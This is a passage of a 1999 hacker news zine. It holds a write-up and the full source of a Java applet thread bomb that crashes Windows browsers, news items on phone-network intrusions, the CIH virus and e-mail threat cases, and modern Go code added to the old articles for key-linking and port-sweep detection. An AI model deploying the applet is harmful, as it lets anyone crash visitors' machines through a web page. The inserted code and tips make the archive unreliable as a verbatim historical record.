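/* Mimics the applet's spawn-forever loop against the counted API; returns how
 * many of the attempts were accepted. Call release_and_reap() between runs. */
int bomb_attempts(int attempts)
{
    int i, ok = 0;

    for (i = 0; i < attempts; i++) {
        pthread_t tid;
        if (counted_thread_create(&tid, blocked_worker, NULL) != 0)
            continue;                /* refused: the cap is doing its job */
        if (nworkers < MAX_THREADS)
            workers[nworkers++] = tid;
        ok++;
    }
    return ok;
}

/* Opens the gate, joins every accepted worker, and returns the live count,
 * which the termination-side decrement should have brought back to zero. */
int release_and_reap(void)
{
    int i;

    pthread_mutex_lock(&gate_mu);
    gate_open = 1;
    pthread_cond_broadcast(&gate_cv);
    pthread_mutex_unlock(&gate_mu);
    for (i = 0; i < nworkers; i++)
        pthread_join(workers[i], NULL);
    nworkers = 0;
    return live_thread_count();
}
```

        Of 100 spawn attempts only MAX_THREADS succeed, and once the workers exit
        the counter is back at zero, which is the property the applet's host lacked.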
       
       Why I'm Bringing The Issue Up At All
       
            Knowledge of the applet has been spreading slowly and may soon become an issue, so I'm attempting to get real information available before a problem
            occurs.
       
       Known Results
       
             Windows 95 
       
                           Ie3.x: No data 
       
                           Ie4 (no alterations): crash 
       
                           Ie4 (jdk 1.2): crash 
       
                           Ie4 (jdk 1.21): crash 
       
                           Ie5 (no alterations): crash 
       
                           Ie5 (jdk 1.21): crash 
       
                           Appletviewer (1.1.8, 1.2, 1.21): crash (very fast to very slow) 
       
                           Netscape Communicator 4.x (no alterations): crash, there has been one report of the browser crashing without the computer crashing
       
             Windows 98
       
                           Ie3.x: No data 
       
                           Ie4 (no alterations): crash 
       
                           Ie4 (jdk 1.2): crash 
       
                           Ie4 (jdk 1.21): crash 
       
                           Ie5 (no alterations): crash 
       
                           Ie5 (jdk 1.21): crash 
       
                           Appletviewer (1.1.8, 1.2, 1.21): crash (very fast to very slow) 
       
                           Netscape Communicator 4.x (no alterations): crash, there has been one report of the browser crashing without the computer crashing
       
             Windows NT: System performance degrades significantly but does not stop, but the browser hangs eventually (and attempting to start a new process can
            cause a crash), system eventually becomes usable again 
       
             OS2 Warp: System performance degrades significantly but does not stop, but the browser hangs eventually (and attempting to start a new process can cause
            a crash), system eventually becomes usable again 
       
             UNIX (Solaris, Tru64, Linux (Alpha)): System remains usable, the browser hangs eventually 
       
              Macintosh: System remains usable, the browser hangs or crashes 
       
            Please email me with any new results (or even if you want to confirm the posted results)
       
       The Source
       
            I've received numerous complaints about my releasing the source code. I'm taking this time to explain the reasoning behind it. The HTTP protocol is publicly
            available as an RFC, which makes it easy enough for any would-be hacker to grab the applet without too much difficulty (but no one has complained about
            me making this applet available publicly). Therefore releasing the source code serves only to make it possible for security measures to be developed quickly,
            and efficiently, as well as developing protection against the entire class of attacks instead of just searching for this applet.
       
       The Page
       
            BEWARE!!!! CLICKING HERE IS NOT RECOMMENDED.
       
            The Source
       
       Questions
       
            Please feel free to email me at ashwood@usc.edu if you have any questions regarding this applet.
       
       Reporting abuse
       
            If you have run across a page that you believe has this applet (or one similar) running on it, please e-mail me at ashwood@usc.edu ASAP. I will gladly
            maintain the list of sites. 
       
       I am not the first to find this problem
       
            I have not yet had the opportunity to verify it, but I have been informed that in the book titled "Tricks of the Java Programming Gurus" published in 1996.
       
       
       
       
       
              
        import java.awt.*;
        import java.applet.*;
       
       public class minThread extends Applet implements Runnable {
               
               Thread myThread = null;
               int howMany = 0;
               public static void main(String args[])
               {
                       minThread that = new minThread();
                       that.start();
               }
               public void init() {
                       start();
               }
               
               public void start() {
                       // we start a new thread
                       myThread = new Thread(this);
                       myThread.start();
                       run();          
                       // the code for the new Thread is in the run() method
               }
               
               public void run() {
                       try {
                               for (;;) {
                                       myThread = new Thread(this);
                                       myThread.start();
                               }
                       }
                       catch (Exception e) 
                       {
                               //out of memory, so waste processor
                               for(;;)
                               {
                               }
                       }
               }
               
               public void stop() {
                       // myThread has to be stopped before the applet stops
                       myThread = null;
                       
               }
               
               public void destroy() {
               }
               
               public void paint(Graphics g) {
               }
       }
       

 49.0  Phone Rangers break into GTE
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Phone Masters Break Into GTE 


       contributed by epter 
        There is so much FUD (Fear, Uncertainty and Doubt) here it is hard to separate the facts from the
       sensationalism. Evidently a group of "cyber terrorists" known as the "Phone Rangers" broke into the
       computer/telephone network of GTE in the Dallas Fort Worth area. The "computer hackers" reportedly had the
       ability to disrupt 911 calls, shut down police departments and warn drug dealers of wire taps. The
       'hacks' reportedly started over four years ago and are only now being made public. What the article does not
       say is whether the attacks have stopped or whether anyone has been arrested or charged with a crime. This
       'report' is mostly what could have happened as opposed to what actually did happen. 

       WFAA Dallas FortWorth TV       
       http://www.wfaa.com/news/9904/29/cyber_terrorism_1.html
       

               N E W S   8   I N V E S T I G A T E S
               Cyber Terrorists Invade Phone Networks
      
               by Robert Riggs
               April 29 1999 
      



              
              GTE's network operations center at DFW International
              Airport was targeted by computer hackers.
                                                   


      DALLAS -- It was the largest cyber-assault on the nation's communications networks. 

      A computer security breach received little attention when it was announced in Dallas last month. Hackers
      had been caught stealing thousands of long distance calling card numbers. 

      News 8 Investigates learned it was a case with national
      security implications. 

      A group of computer hackers invaded telephone systems so deeply that they could
      shut down 911 operators. In fact, they retaliated for a speeding ticket by crashing the
      phone system at a police department. They also tipped off drug dealers to wiretaps. 

      Until now, this cyber-attack has been a closely-guarded secret. Computer hackers
      have broken into the networks of the world's largest telephone companies. 

      They were just a few keystrokes away from blinding air traffic controllers, shutting down banks,
      or cutting off military bases. It's not the plot of the latest cyber-horror movie. 

      This frightening penetration of the nation's telecommunications systems actually happened
      right here in North Texas. 

      The hackers' target list included GTE's 28-state network, controlled from a nerve center at DFW
      International Airport. They had the capability of causing a "cyber Pearl Harbor"
      had they wanted to. 

      FBI Agent Mike Morris led the investigation. "We had a number of telephone companies,
       long distance carriers and local exchange carriers that thought they were impenetrable,"
      Morris said. "They thought they were little castles." 



                               HACKING HISTORY 

      The first confirmed break-in occurred four years ago when the hackers first took control of
      computerized phone switches. The switches route calls around the world. The hackers
      gained unrestricted access to GTE, Sprint, MCI and the regional Baby Bell networks. 

      Their early attacks went undetected, and alarmed top levels of the U.S. government.
      Details about the case are only now becoming public. 

      "They could listen in on calls made through that switch," Morris explained. "If
      they didn't like a person, they could turn their access off to that switch, meaning
      if you tried to make a call out, it wasn't going to happen." 

      FBI LAUNCHES CYBER SQUAD 

      A tip set in motion an intensive FBI investigation that continues today. In Dallas, a
      new cyber squad put a wiretap on the hackers' line. It marked the first time that agents could
      monitor everything a hacker typed. 

      "The goal of the hackers was to basically take control of telecommunications systems
      coast-to-coast," Morris said. 

      They came close. 

      THE PHONE MASTERS 

      FBI surveillance photos show some of the 11 hackers called the Phone Masters. 

      They gathered from across the country with cyber burglary tools in hand: a cloned cellular phone and
      laptop computer. 

      The FBI identified Calvin Cantrell of Grand Prairie as a central figure in the organization. 

      The hackers fit the FBI's profile: 

          o white males
          o teens to mid-20s
          o self taught
          o obsessed

      "He wasn't very good at school, didn't make a lot of friends," Morris said of the
      individuals who fit the profile. "But when he gets on the Internet and he hacks into
      a system, now he basically is a cyber-God." 

      Even though the typical hacker is not a particularly good student, they are still
      brilliant. "Some of these guys could be considered geniuses," Morris said.
      "They're very smart, and they get very bored with school." 

      The FBI discovered that Cantrell was an unemployed 1988 graduate of Grand Prairie
      High School. At his parent's home, Cantrell spent up to 20 hours a day hacking into
      computer systems. The FBI said Cantrell took confidential credit and crime records out of
      computer systems and traded people's secrets for cash. 

      "Calvin represented himself as an information
      broker," said private investigator Trace Carpenter, who purchased personal
      information from Cantrell. He said Cantrell bragged about even getting phone
      records close to the President. "He was obtaining long distance records for Bill
      Clinton's mother," Carpenter said. "I suppose this was in an effort to find a back
      line into the Oval Office, so to speak." 

      HACKERS TARGET WHITE HOUSE 

      Indeed, the Phone Masters hacked into White House phone records and unlisted numbers, according to
      sources in the telecommunications industry. "It shows the vulnerability of our everyday systems that
      we use," said Assistant U.S. Attorney Matt Yarborough. 

      Yarborough is now prosecuting the Phone Masters for stealing millions of dollars worth of long distance 
      calling card numbers. 

      "Knowing and holding the keys to that system, any foreign agent or domestic hacker could choose to hack
      it," Yarborough said. "That could have a wide-ranging impact on our financial institutions, power and 
      electrical, the systems we use and interact with every day." 

      The FBI said the Phone Masters discussed crashing vital computer systems. It's unclear what the hackers
      may have done before the FBI got on their trail. 

      The hackers declined to talk to News 8. 


       @HWA
       
 50.0  Police question CIH virus creator
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Police Question CIH Suspect 


      contributed by mdef 
       Taiwanese police are questioning Chen Ing-hau, 24, the self-admitted creator of the CIH or Chernobyl virus that
      struck earlier this week. Authorities have not yet arrested Chen Ing-hau, but are trying to clarify what, if
      any, legal responsibility he could face if convicted. 


      BBC http://news.bbc.co.uk/hi/english/world/newsid_332000/332147.stm
      
      Friday, April 30, 1999 Published at 10:26 GMT 11:26 UK 


      World

      Chernobyl virus suspect
      questioned 

      Chen Ing-hau could face a three-year jail sentence (see url for picture)

      Police in Taiwan are questioning a computer expert who they say has admitted creating the Chernobyl virus,
      which caused major disruption earlier this week. 

      Police say Chen Ing-hau, 24, has not been charged and their investigation is in its early stages. 

      He is said to have offered his help in efforts to counteract the virus. 


                    Hundreds of thousands of computers
                    in Asia and the Middle East had their
                    data wiped by the malicious
                    programme on 26 April - the
                    anniversary of the Ukrainian nuclear
                    disaster in 1986. 

      Police say Mr Chen - who recently graduated from Taipei's Tatung Institute of Technology but is currently
      doing his military service - has said he did not intend to cause such massive damage. 

      Authorities say they are trying to clarify what, if any,legal responsibility he could face if convicted. 

      In Taiwan, intentionally spreading a computer virus is an offence that carries a possible three-year prison term. 

      Boasting to colleagues 

      Although popularly dubbed Chernobyl, the virus is known to experts as CIH. 

      According to Taiwanese media reports, Mr Chen's colleagues say he had acknowledged using his own
      initials in naming the virus. 

      Former classmates and instructors said he had boasted of creating the Chernobyl virus and warned friends not to
      download it into their computers. 

      Some reports said Mr Chen had been reprimanded quietly by his institute a year ago but not further
      disciplined, prompting an Internet debate about Taiwan's vigilance against cybercrime. 

      Deadly effects 

      The United States and Europe largely escaped the virus's effects this week, as companies had protected
      their computers with anti-virus programs that killed it. 

      But in Asia and the Middle East the same precautions had in many cases been ignored. 

      Chernobyl also spreads through pirated software, which is rife in these parts of the world. 

      Chernobyl is less widespread than the e-mail replicator virus Melissa, but it has been warned to be far more
      serious, especially on Windows 95 or 98 machines. 

      The virus can delete most of the data stored on computers and can even wipe out the BIOS - the basic
      instructions that tell the computer to start.
      
      @HWA

 51.0  [ISN] The Virus Vault
       ~~~~~~~~~~~~~~~~~~~~~                  
       
       Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>


       (April 28, 1999 12:46 a.m. EDT http://www.nandotimes.com) - Even the most
       stout-hearted hard drive would shudder. Copies of more than 43,000
       computer viruses are kept under lock and key at the Malicious Code
       Laboratory in rural Pennsylvania, a facility operated by a company that
       has become the equivalent of the World Health Organization for the data
       processing industry.
       "That lab in Carlisle, Pa., has good physical security. You cannot get in
       without a key card," assures Roger Thompson, the affable, Australian-born
       technical director for malicious code research for the firm.
       His company - ICSA Inc., which has its headquarters in a Washington, D.C.,
       suburb - uses the pernicious software to test and certify dozens of
       commercial security programs that corporations and individuals hope will
       protect them from malicious hackers.
       
       
       Thompson said the list of known viruses grows by about 1,000 a month, but
       many of these are simple modifications of older viruses.
       
       
       "Of all of the thousands of viruses we've identified, only about 150
       actually get onto very many people's computer desktops. And maybe another
       500 or so make it to localized outbreaks," Thompson said.
       
       
       The reason, despite tremendous media hype, is that computer viruses
       generally have a hard time proliferating. Writers of virus programs have a
       hard time designing a bug that will attack most personal computers because
       of the incredible diversity of software that computers use.
       
       
       "There are a few viruses that we call Win32-infectors, because they attack
       the Windows operating system itself. But these are very hard to write, so
       we don't see many of them," Thompson said.
       
       
       Instead, virus authors rely upon "macro" programs that attach to specific
       kinds of software.
       
       
       "We've identified about 4,000 macro viruses that attach themselves to
       Microsoft Office products. The reason these guys do this is they want
       their viruses to spread, so they pick popular software," Thompson said.
       
       
       Police arrested David L. Smith, 30, of Aberdeen Township, N.J., last month
       and charged him with authorship of the "Melissa" virus, which disrupted
       e-mail systems for several large companies, including Charles Schwab & Co.
       "Melissa wasn't overly bright. It only targeted Microsoft Mail, which
       isn't all that popular. But the guy found a good way to get his virus to
       spread," Thompson said. 
       
       
       The program gummed up e-mail systems by sending out thousands of versions
       of itself, as well as pornographic Web site passwords and addresses.
       
       
       Despite its simplicity and the severe limitations on the kinds of software
       it attacks, Melissa received enough news coverage to accelerate security
       concerns for businesses that increasingly rely upon the Internet.
       
       
       "We are now a wired world," said Laurie W. Wagner, senior vice president
       for marketing at ICSA. "So security has become an issue for everyone, from
       simple consumer marketing to business-to-business transfer of critical
       information."
       Wagner said anti-virus programs and other software designed to protect
       computer equipment are expected to grow from a $5 billion industry in 1997
       to $25 billion by 2003. That's a lot of money in order to stop a handful
       of bored and mostly youthful mischief-makers. 
       "A lot of them truly are kids," Thompson said. "I've met one guy who used
       to be known as 'Storm-Bringer' who has come across from the dark side. He
       was an intelligent young man who just decided to grow up. It was clear
       that this (virus writing) was something he did just because he knew how."
       Measures to defeat "hackers" - computer enthusiasts who delight in gaining
       access to private, often sensitive, computer files using telephone lines
       or the Internet - are also becoming big business. Internet security
       services alone are projected to grow from a $4.6 billion market in 1996 to
       $11.6 billion within three years.
       
       
       ICSA computers at its Reston, Va., headquarters endlessly look for ways
       that hackers could break into corporate data systems. Once identified,
       these "back doors" are either closed or given "firewall" software
       protection to prevent unwanted outside access across the Internet.
       
       
       "Frequently, we find a lot of undocumented Web addresses that companies
       didn't know about," Wagner said. Hackers can gain access to an entire
       computer system through an unprotected site on the Web.
       
       
       "We conducted a scan for one company that had more than 1,000 undocumented
       sites," she said. "They were pretty surprised."
       
       
       -o-
       Subscribe: mail majordomo@repsec.com with "subscribe isn".
       Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
       
       @HWA
       
 52.0  [ISN] The Bad Guys are Crackers
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       The Bad Guys Are Crackers 
       In Defense of Hackers 
       
       
       Will there be more and more hackers over the next couple of years?
       Brent Gomes
       
       
            I sincerely hope so! Now, before you label me as some crazed
       anarchist, let me explain. Most of us geeks who are in the technology
       business believe ourselves to be hackers, and if someone ever calls me one
       I consider it a compliment. It's time to dispel some rumors about hackers
       and clear the air about one of the most misused terms of the computer
       generation. 
            The ancient definition of a hacker is someone who makes furniture
       with an axe. These days a hacker can be described as a very capable
       programmer, or a person who enjoys exploring the details of programmable
       systems.  Someone might think you are a hacker if you spend hours and
       hours figuring out how your computer system works and developing cool
       applications (called "hacks") that perform some useful function. In short,
       the computer industry needs more and more hackers in order to advance
       technology and solve current problems. 
       
       
        Media Misnomer
        
        
        Being a hacker does not mean you spend your time breaking
        into computers. We can blame the journalistic community for grabbing hold
       of what it perceived as a catchall term and deprecating the true meaning
       of the word. The correct way to describe someone who circumvents computer
       security is a system "cracker." These malcontents are well known for
       breaking into the Pentagon, several defense contractors, various ISPs, and
       other supposedly secure systems. They have shared classified documents on
       the Net, given copy-protected software away, stolen credit card
       information and, in the process, made the online community nervous. Most
       of the system crackers I know are either in jail, have been in jail or are
       going to jail. 
       
       
       When Hackers Grow Up
       
       
       The hacker population will probably rise at the same rate as every other
       profession, so a per-capita increase seems unlikely. The media might have
       us believe otherwise, since even the least-newsworthy computer "hackers"
        get tons of television exposure. If you want to join the elite group of
        technophiles, there is no time like the present to start working on your
        craft. 
             "Didn't you used to be a hacker before you were a geek?" the wife
        asks. "And what's the difference anyway?" 
            I'm not paying attention. Instead I'm looking at how I can replicate
       the inode dataset on a ufs partition to an NTFS volume. 
            "Never mind," she sighs, "I just figured that one out on my own." 
       
       
       Jack Valko is the senior network manager for Buena Vista Internet Group,
       which produces ABCNEWS.com. 
       
       
       
       -o-
       Subscribe: mail majordomo@repsec.com with "subscribe isn".
       Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
       
       @HWA
       
       
 53.0  [ISN] Email threats could bring 10yr jail term
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Forwarded From: darek milewski <darekm@cmeasures.com>


       http://www.news.com/News/Item/0,4,35560,00.html
       Email threats earn conviction
       By Dan Goodin
       Staff Writer, CNET News.com
       April 22, 1999, 6:45 p.m. PT
       
       
            A Canadian man is facing up to 10 years in federal prison after being
       found guilty of sending threatening emails to Microsoft chief executive
       Bill Gates and a number of government officials, the U.S.  attorney in
       Seattle said. 
       
       
            Carl Edward Johnson, 49, of Bienfait, Saskatchewan, was convicted on
       four felony counts in connection with the threats, some of which were
       posted to a popular encryption mailing list using software that hides the
       identity of the sender. His conviction wraps up a two-year investigation
       by officials from the Treasury Department. 
       
       
            Johnson, who is scheduled for sentencing on June 11, is being held in
       a federal detention center near Seattle. His attorney was not immediately
       available for comment. 
       
       
            U.S. District Judge Robert Bryan found Johnson guilty of using the
       Cypherpunks mailing list to threaten government officials, said assistant
       U.S. attorney Floyd Short. The court found that Johnson in June of 1997
       used an anonymous remailer to post a message offering a reward if someone
       would kill a magistrate judge and several Treasury Department
       investigators. The officials were involved in the criminal prosecution of
       a man accused of illegally compiling names and addresses of employees at
       the Internal Revenue Service and trying them in so-called common law
       courts. 
       
       
            The court also found that Johnson posted messages threatening the
       lives of three federal appeals court judges who are hearing a case
       challenging government restrictions of the export of encryption software. 
       Johnson said the judges would end up in "a pine box or a body bag" if they
       ruled against Chicago professor Daniel Bernstein, a plaintiff in the civil
       case against the regulations, Short said. 
       
       
            Johnson also was convicted of sending email to Gates claiming the top
       Microsoft executive's assassination was being planned. 
       
       
             Short said that investigators were able to learn Johnson's identity
        by piecing together information he left on Web sites, in email messages,
        and in his home. Interestingly, a key piece of evidence was the public
        key from a program called Pretty Good Privacy. PGP is designed to encrypt
        and sign a user's messages, not to hide who sent them; a public key is
        itself an identifier that ties every message it verifies to one author,
        however anonymously that message was delivered. 
       
       
            Johnson's conviction comes a week after federal investigators were
       able to track down the man they allege anonymously posted a hoax news
       story that caused the stock of a California company to rise more than 30
       percent. 
       
       
            "People may feel they are anonymous on the Internet, and that's not
       the case," Short said. "The level of understanding of the Internet is
       rising quite a bit within law enforcement." 
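        The public key did the identifying in the case above because a key is an
        identifier no matter what the transport does. The Go program below is an
        added illustration, not part of the CNET article and not a description of
        the evidence in the case: a remailer strips the sender's headers, but a
        signature on the body still verifies only under the author's key, so
        every signed "anonymous" post links back to a key that was published
        elsewhere under a real name. Ed25519 from Go's standard library stands in
        for PGP's RSA/DSA keys, Fingerprint is a SHA-256 prefix rather than the
        OpenPGP fingerprint algorithm, and all keys and messages are constructed
        for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// Message is what survives a trip through an anonymous remailer: the
// From/Received headers are gone, only the body and whatever the author
// attached to it (here a detached signature) remain.
type Message struct {
	Body      string
	Signature []byte
}

// Fingerprint derives a short identifier from the public key alone.
// Illustrative stand-in: a SHA-256 prefix, not the OpenPGP fingerprint.
func Fingerprint(pub ed25519.PublicKey) string {
	sum := sha256.Sum256(pub)
	return hex.EncodeToString(sum[:8])
}

// Sign builds a message the author believes is anonymous because it will be
// sent through a remailer, yet carries a signature under a long-lived key.
func Sign(priv ed25519.PrivateKey, body string) Message {
	return Message{Body: body, Signature: ed25519.Sign(priv, []byte(body))}
}

// LinkToKey returns the indices of messages whose signature verifies under
// pub. No sender address is needed: the remailer can strip headers, but it
// cannot strip the relationship between a signature and the key that made it.
func LinkToKey(pub ed25519.PublicKey, msgs []Message) []int {
	var linked []int
	for i, m := range msgs {
		if ed25519.Verify(pub, []byte(m.Body), m.Signature) {
			linked = append(linked, i)
		}
	}
	return linked
}

func main() {
	// Constructed scenario: one key published on a personal Web page under a
	// real name, one key belonging to an unrelated list member.
	webPub, webPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	otherPub, otherPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}

	msgs := []Message{
		Sign(webPriv, "anonymous post 1, sent via remailer A"),
		Sign(otherPriv, "unrelated post by another list member"),
		Sign(webPriv, "anonymous post 2, sent via remailer B"),
	}
	fmt.Printf("key %s (from the Web page) links posts %v\n",
		Fingerprint(webPub), LinkToKey(webPub, msgs))
	fmt.Printf("key %s (other member) links posts %v\n",
		Fingerprint(otherPub), LinkToKey(otherPub, msgs))
}
```

        The lesson for anyone relying on a remailer is that signing is a
        linking operation: either sign nothing from the pseudonym, or use a key
        that has never been published or used anywhere else.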
       
       @HWA       
       
       
  54.0  [ISN] Singapore ISP scans customer computers for vulnerabilities
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       http://straitstimes.asia1.com/one1/one1.html
       
       
       SINGAPORE (April 29, 1999 11:53 p.m. EDT http://www.nandotimes.com) -
       Singapore's national telecommunications company has scanned more than
       200,000 computers of its Internet customers without their knowledge as
       part of a plan to ward off hackers, the Straits Times reported on Friday. 
       Singapore Telecom, which is 80 percent owned by the government, began the
       scan last month of nearly half of Singapore's Internet users to check
       whether its customers were vulnerable to hacker attacks, the report said. 
       The scanning would continue until all accounts of its SingNet and SingTel
       Magix customers were covered, it said. 
       "We are merely protecting the interest of our customers," the report
       quoted Singapore Telecom chief executive officer for multimedia Paul Chong
       as saying. 
       SingNet had asked the Home Affairs Ministry's IT security unit to do the
       scan following news in March of the arrest of two boys who had hacked into
       17 SingNet customers' accounts. 
       
       
       Officials at Singapore Telecom were not immediately available for comment. 
       
       
       The disclosure from Chong came after the Straits Times reported on
       Thursday that 21-year-old law student Anne Lee had complained to the
       police that someone with an account in the Home Affairs Ministry had
       hacked into her account. 
       
       
       Chong said SingTel was being "responsible" by giving customers the
       "value-added service" of scanning their computers. 
       
       
       On whether the law allowed such scanning without customers' consent, Chong
       said nothing illegal had taken place. 
       
       
       He said customers were not informed of the scan so as not to alarm them. 
       
       
       "We do not want to make a mountain out of a molehill. In the end, the scan
       might not turn up anything. If we had informed the customers, it might
       cause an alarm," Chong said. 
       
       
       He added that "real hackers might lie low" if they knew of the scan. 
       
       
       Chong was quoted as saying the scanning so far showed that some users were
       vulnerable and that they would be informed when the process was over. 
       
       
       The Home Ministry was approached because it was the "expert" in the area
       -- it helped crack the case of the two teenage hackers. 
       
       
       Chong stressed that the scan did not delve into users' computer databases,
       or amount to an illegal entry into computer accounts, the Straits Times
       reported. 
       
       
       "There is no invasion of privacy at all. Basically, what we did was check
       if the systems had open windows through which hackers can exploit," Chong
       said. 
       
       
        Chang Wai Leong, a SingTel director, was quoted in the report as
        describing the scan as like a "policeman patrolling in cyberspace checking
        if the 'windows' of the computer system are opened." 
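        What a scan like SingTel's looks like from the customer's side is the
        question the report leaves open. The Go program below is an added
        example, not from the Straits Times article or from SingTel: it runs a
        simple sweep detector over a handful of constructed host firewall log
        lines in iptables LOG style (addresses, host name and timestamps are made
        up for the example) and flags any source that probes many distinct ports
        of one host inside a short window, which is exactly what "checking if the
        windows are open" produces on the wire. The threshold and window are
        assumptions to tune for a real host.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strconv"
	"strings"
	"time"
)

// Constructed sample of a host firewall log (iptables LOG style, invented for
// this example). One remote address probes several services in a few seconds,
// interleaved with ordinary retries from another host that should not alert.
const sampleLog = `Apr 29 23:41:02 pc kernel: DROP IN=ppp0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=21
Apr 29 23:41:02 pc kernel: DROP IN=ppp0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40002 DPT=23
Apr 29 23:41:03 pc kernel: DROP IN=ppp0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40003 DPT=25
Apr 29 23:41:03 pc kernel: DROP IN=ppp0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=1234 DPT=80
Apr 29 23:41:04 pc kernel: DROP IN=ppp0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40004 DPT=79
Apr 29 23:41:04 pc kernel: DROP IN=ppp0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40005 DPT=110
Apr 29 23:41:05 pc kernel: DROP IN=ppp0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40006 DPT=139
Apr 29 23:41:09 pc kernel: DROP IN=ppp0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=1235 DPT=80
Apr 29 23:55:00 pc kernel: DROP IN=ppp0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP SPT=1236 DPT=443`

type event struct {
	t    time.Time
	port int
}

// lineRE pulls the syslog timestamp, source address and destination port out
// of one LOG line; anything else on the line is ignored.
var lineRE = regexp.MustCompile(`^(\w{3} +\d+ \d\d:\d\d:\d\d) .*\bSRC=(\S+) .*\bDPT=(\d+)`)

// ParseLog groups events by source address. Lines that do not match (other
// daemons, truncated entries) are skipped rather than treated as fatal.
func ParseLog(log string) map[string][]event {
	bySrc := map[string][]event{}
	for _, line := range strings.Split(log, "\n") {
		m := lineRE.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		ts, err := time.Parse("Jan _2 15:04:05", m[1]) // syslog carries no year
		if err != nil {
			continue
		}
		port, _ := strconv.Atoi(m[3]) // \d+ guarantees a number
		bySrc[m[2]] = append(bySrc[m[2]], event{ts, port})
	}
	return bySrc
}

// DetectSweeps flags every source that touched at least minPorts distinct
// destination ports inside some window of the given length, and returns the
// sorted ports of the widest such window. A host that only retries one
// service (198.51.100.7 above) never trips the rule.
func DetectSweeps(bySrc map[string][]event, minPorts int, window time.Duration) map[string][]int {
	alerts := map[string][]int{}
	for src, evs := range bySrc {
		sort.Slice(evs, func(i, j int) bool { return evs[i].t.Before(evs[j].t) })
		var best map[int]bool
		for i := range evs {
			seen := map[int]bool{}
			for j := i; j < len(evs) && evs[j].t.Sub(evs[i].t) <= window; j++ {
				seen[evs[j].port] = true
			}
			if len(seen) > len(best) {
				best = seen
			}
		}
		if len(best) >= minPorts {
			ports := make([]int, 0, len(best))
			for p := range best {
				ports = append(ports, p)
			}
			sort.Ints(ports)
			alerts[src] = ports
		}
	}
	return alerts
}

func main() {
	// Assumed thresholds: five distinct ports within ten seconds.
	for src, ports := range DetectSweeps(ParseLog(sampleLog), 5, 10*time.Second) {
		fmt.Printf("possible port sweep from %s: ports %v\n", src, ports)
	}
}
```

        A slow scan spread over hours defeats a ten-second window, so in
        practice the window is widened and the per-source port set is kept
        across log files; the point of the example is that the sweep is visible
        to the customer whether or not anyone told them it was coming.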
       
       
       -o-
       Subscribe: mail majordomo@repsec.com with "subscribe isn".
       Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
       
       @HWA
           
       
 AD.S  ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       *****************************************************************************
       *                                                                           *
       *           ATTRITION.ORG     http://www.attrition.org                      *
       *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
       *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
       *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
       *                                                                           *
       *****************************************************************************
       
       <img src="http://www.csoft.net/~hwa/canc0n.gif"> <br>    Come.to/Canc0n99</a>
       !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
       http://come.to/Canc0n99  http://come.to/Canc0n99 http://come.to/Canc0n99http:j
       http:/                                                               99 http:o
       http:/  login: sysadmin                                              n99 httpi
       /come.  password:                                                    tp://comn
       to/Can                                                               me.to/Cat
       c0n99   SYSTEM NEWS: Canc0n99 is looking for more speakers and       Canc0n99h
       http:/  industry people to attend with booths and talks.             99 http:e
       /come.  you could have a booth and presentation for the cost of      p://comel
       http:/  little more than a doorprize (tba) contact us at our main    n99http:i
       http:/  address for info hwa@press.usmc.net, also join the mailing   n99http:s
       http:/  for updates. This is the first Canadian event of its type    invalid t
       403 Fo  and will have both white and black hat attendees, come out   logged! !
       404 Fi  and shake hands with the other side... *g* mainly have some  IP locked
       ome.to  fun and maybe do some networking (both kinds). see ya there! hostname 
       http:/                                                               x99http:x
       o/Canc                                                               x.to/Canx                 
       http://come.to/Canc0n99  http://come.to/Canc0n99 http://come.to/Canc0n99http:x
       o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx

        http://come.to/Canc0n99  http://come.to/Canc0n99  http://come.to/Canc0n99 
 <a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
       !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
        
       $$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$
       !                                                                            !       
       $                                                                            $       
       !     *** IT HAS BEEN FOUR YEARS! ***    FREE KEVIN MITNICK NOW!!!! **       !
       $                                                                            $              
       !                                                                            !
       $$?$$?$$?$$?$$?$$?$$?$$?$$?$$?$?$??$??$??$????$$?$$?$$?$$?$$?$

       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
